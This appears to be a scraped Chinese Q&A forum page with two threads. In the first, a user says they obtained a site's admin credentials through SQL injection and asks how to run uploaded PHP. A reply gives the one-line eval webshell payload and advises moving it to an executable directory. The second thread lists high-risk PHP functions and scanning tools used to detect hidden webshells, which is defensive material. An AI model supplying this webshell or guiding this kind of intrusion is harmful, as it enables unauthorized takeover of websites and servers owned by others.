追加分PHP一句话木马怎么用

Posted 2023-03-22

现在通过注入得到了后台账号密码，里面有上传功能，而且可以上传php文件，只是那个目录却不能执行PHP CGI等文件……怎么办？

如果没有执行权限的话，你就算上传上去了也是没有用的。你只有想办法把木门上传到其他能执行的目录才行。
一句话木马的话，就是<?php eval ($_POST[val]); ?>
eval函数的功能就是把传入的值当成程序来执行。追问

嗯，是的， 这个我都知道。
其实，确切的说，我是没有思路……
在这里想听下高人的见解……呵呵。
留个Q吧，交流一下~

追答

百度HI我吧

参考技术A PHP 能做木马?追问

当然能！
不过不像C++等开发的客户端的，而是服务端……
也可以叫做木马吧……

参考技术B 勿在浮沙筑高台，想玩这个，打好基础先。追问

请问基础都包含什么？
这是入侵网站，无非就是了解些SQL语句，以及服务器的相关配置……
既然你是高手，指点一下呗~

PHP的网站，怎么扫描出潜藏的一句话木马

参考技术A 查找那些高危函数就行了，比如eval

php后门木马常用的函数大致上可分为四种类型：

1. 执行系统命令: system, passthru, shell_exec, exec, popen,
proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate,
gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once,
file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file本回答被提问者和网友采纳 参考技术B 可以使用一些专业软件，比如安全狗，D盾等。 参考技术C 采用第三方专业软件把，我所知道的，安全狗和D盾都可以扫描一句话木马，你可以去看看，了解下。 参考技术D 用服务器软件。。